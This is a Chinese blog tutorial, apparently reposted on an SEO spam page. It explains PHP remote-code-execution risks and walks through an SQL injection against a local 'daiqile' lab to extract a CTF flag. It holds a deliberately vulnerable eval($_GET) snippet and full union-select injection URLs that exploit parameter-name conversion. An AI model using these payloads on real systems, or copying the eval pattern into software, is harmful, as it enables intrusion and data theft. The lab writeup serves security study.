当前位置: 首页 > news >正文

买个网站域名多少钱创意ppt模板大全

买个网站域名多少钱,创意ppt模板大全,移动端什么意思,无锡做智能网站目录 简述rce漏洞 可能产生rce漏洞的函数 RCE代码执行漏洞示例 贷齐乐系统多处SQL注入漏洞 ​编辑 爆出库名 爆出表名 爆出表下的列名 查flag数据 简述rce漏洞 ​ rce漏洞,即远程代码执行和远程命令执行漏洞。这种漏洞允许攻击者在后台服务器上远程注入操作…

目录

简述rce漏洞

可能产生rce漏洞的函数

RCE代码执行漏洞示例

贷齐乐系统多处SQL注入漏洞

​编辑

爆出库名

爆出表名

爆出表下的列名

查flag数据


简述rce漏洞

​ rce漏洞,即远程代码执行和远程命令执行漏洞。这种漏洞允许攻击者在后台服务器上远程注入操作系统命令或代码,从而控制后台系统。

可能产生rce漏洞的函数

1.PHP的system()和exec()函数:这些函数用于执行外部命令,如果未对用户输入进行适当的过滤或验证,攻击者可能利用这些函数执行任意命令。
2.PHP的eval()函数:该函数用于执行字符串作为PHP代码,如果未对用户输入进行适当的过滤或验证,攻击者可以利用此函数执行任意代码。
3.PHP的create_function()函数:该函数用于动态创建函数,如果未对用户输入进行适当的过滤或验证,攻击者可以利用此函数执行任意代码。

RCE代码执行漏洞示例

<?php$code=$_GET['x'];eval($code);
?>

访问刚刚创建的php文件,参数后面的内容写为“phpinfo()”.可以看到网页执行了phpinfo()语句并进行了回显。

访问刚刚创建的php文件,参数后面的内容写为“echo 123;”.可以看到网页执行了echo 123语句并进行了回显

贷齐乐系统多处SQL注入漏洞

该漏洞基于错误的WAF引发的,同SQLi靶场中的29关到31关类似,但该漏洞是错误的WAF引起的,而29关到31关则是HTTP参数污染引起的。还是有些不同之处的,而这里是HPP全局参数污染以及PHP的一个特性。

单引号闭合

爆出库名

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables&i.d=1&submit=1

爆出表名

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x637466/**/limit/**/0,1&i.d=1&submit=1

爆出表下的列名

http://127.0.0.1/daiqile/index.php/?&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273&i.d=1&submit=1

http://127.0.0.1/daiqile/index.php/?&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/0,1&i.d=1&submit=1

http://127.0.0.1/daiqile/index.php/?&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/3,1&i.d=1&submit=1

查flag数据

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,flag,3,4/**/from/**/ctf.users&i.d=1&submit=1

总结

PHP特性:在GET请求中,如果参数的键(key)包含点号(.),PHP会自动将其转换为下划线(_)。例如,参数i.d会被转换为i_d

http://www.yayakq.cn/news/146812/

相关文章:

  • 如何在八戒网便宜做网站wordpress文章存在哪
  • 杨凌做网站什么是网络营销与直播电商
  • 北京市建设规划网站wordpress前端发布主题
  • 西安火车站建设XART视频库WordPress
  • 哪个网站做海报好北京网站制作最新教程
  • 创建网站需要注意的问题哈尔滨城乡建设网站
  • 企业网站货物查询怎么做网站建设报价单 excel
  • 重庆万州网站建设找谁神马网站快速排名案例
  • 建一个简单的网站多少钱东莞seo外包公司哪家好
  • 网站平台之间的关系wordpress邀请奖励
  • 网站名称怎么收录公司可以网上注册吗
  • 喀什的网站怎么做优化网站用软件好吗
  • 淮南做网站的公司微信软文推广怎么做
  • 陕西网络推广维护seo快速优化报价
  • 转转怎么做钓鱼网站郴州住房和城乡建设部网站
  • 企业门户网站实现永久免费个人网站申请注册
  • 惠城网站建设服务重庆市建筑协会信息网
  • 长沙营销型网站制作费用wordpress淘宝客响应式模板
  • 动漫男的和女的做视频网站wordpress手机端和pc端兼容
  • destoon 网站搬家用asp做网站
  • 网站后台无法访问泾川县建设局网站
  • 网站建设与策划青海省建设厅报名网站
  • 便宜网站建设哪家好万能网址大全
  • 高密做网站哪家好价位深圳定制展会时间表
  • 温州做网站厉害的公司有哪些自己做静态网站的步骤
  • 河北省建设厅网站登陆设置内蒙古住房和城乡建设厅网站 工程建设管理
  • 厦门网站建设哪家不错闽侯做网站
  • 怎样用文本建一个网站石家庄酒店网站建设
  • 企业网站建设的基本步骤软件开发公司企业
  • 成都怎么成立网站深圳网站设计师培训学校